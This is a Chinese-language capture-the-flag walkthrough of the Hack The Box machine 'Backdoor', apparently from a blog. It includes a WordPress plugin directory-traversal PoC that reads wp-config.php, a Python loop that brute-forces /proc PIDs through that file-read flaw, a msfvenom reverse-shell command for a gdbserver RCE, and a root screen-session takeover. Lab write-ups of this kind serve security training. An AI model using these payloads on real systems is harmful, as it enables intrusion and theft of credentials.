Backdoor
Enumeration
nmap
第一次扫描发现系统对外开放了22,80和1337端口,端口详细信息如下
22端口对应的是ssh服务,80端口使用Apache,title上写着backdoor,而且可以看出使用了wordpress,1337端口暂时还不能确定
TCP/80
访问页面,经典的wordpress风格,一访问页面就可以看到页面四个链接,分别是home,about,blog,contact,点击home跳转失败,显示无法识别域名backdoor.htb,需要将其添加到/etc/hosts中。剩下三个也只能看到一些基础信息,没什么好玩的
配置完成能够解析域名后,访问该链接,但是并没有发现什么可以利用的东西
可以尝试枚举一些目录,wordpress默认的插件安装目录是/wp-content/plugins
可以看到默认的index.php目录已经被删除,可以看到该目录下只有一个电子书下载的插件和一个hello.php,在电子书下载插件目录中,有一个readme文档,其中揭露了插件的版本为1.1
Exploitation
WordPress Plugin eBook Download 1.1 - Directory Traversal
在知道了一些基本信息后,可以搜索相关内容看看是否存在已知的漏洞,可以直接拿来利用
该目录遍历漏洞详情如下,可以看到我们需要能够访问filedownload.php文件,而在wp-content目录下确实有这个php文件,然后利用目录遍历去请求wp-config.php文件,从该文件的名字也能看出来其中包含了很多配置信息
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================按照上文Poc读取指定文件,然后在其中发现了一些有关数据库的凭据信息
有了一个密码,又存在LFI,考虑读取/etc/passwd内容,然后看某个用户能否使用数据库密码登录,有一个user用户,但是并不能成功登录ssh
/proc/{PID}/cmdline
在最开始发现系统还对外开放了1337端口,但是这个端口使用curl,ncat,telnet等方式均无法访问,因为存在LFI,可以读取远程主机中关于1337端口对应服务的信息
需要使用暴力破解/proc/{pid}/cmdline文件的方式来实现,在linux中,该文件用于显示运行对应PID进程时的命令,可以先运行一个tcpdump程序,使用ps -aux | grep tcpdump命令来查看相应程序的pid,最后查看/proc/{pid}/cmdline文件,现实的就是运行tcpdump的命令
运行tcpdump程序后查看相应程序的pid
将获取到的pid填入对应位置,查看15806,得到结果如下,显示了执行时的命令
Brute Force PID
现在,我们可以尝试利用burpsuite的暴力破解来看看1337端口到底在运行什么服务,通过简单测试,发现可行,那么只需要将请求包发送给intruder,然后检索1-1000的内容
也可以写python脚本来爆破,写一个pid的循环,然后请求url,最后打印输出
import requests
from bs4 import BeautifulSoup
for i in range(1,1000):
url = "http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/"+str(i)+"/cmdline"
req = requests.get(url)
print(req.text.replace('<script>window.close()</script>',''))经过漫长的暴力破解,最终在pid为852的进程中看到了1337端口,运行着gdbserver
GDB是GNU项目的调试器,是一种调试工具,gdbserver是可以远程运行GDB的一个应用程序,搜索发现gdbserver 9.2版本存在rce漏洞
GNU gdbserver 9.2 - Remote Command Execution (RCE)
虽然暂时无法确定目标系统使用的版本,但是值得一试
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 PrependFork=true -orev.bin
在本地监听4444端口,然后执行指令即可得到shell
Privilege Escalation
之前得到的密码也没起到什么作用,但是之前在爆破pid时还发现pid为850的进程是root运行的,可以看看是什么
screen是一个类似于tmux的终端多路复用器,可用于启动会话,然后在该会话内打开任意数量的虚拟终端,即使窗口不可见或者断开链接,在screen中运行的进程也将继续运行,会话分离时,最初从屏幕启动的进程仍在运行并由本身管理。
screen -dmS root意味着screen会话以分离模式启动,该会话被命名为“root”,,当创建新的屏幕会话时,会在/var/run/screen位置创建一个新目录,名称为s-{username},在此目录中使用屏幕会话名称创建屏幕会话文件,可以使用用户dotguy在本地创建一个屏幕会话,名称为test_session
用于附加到为不同用户创建的屏幕会话的默认屏幕语法是screen -x user/session_name
但是提示需要添加终端类型,可以输入以下指令
export TERM=xterm
screen -x root/root
196
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
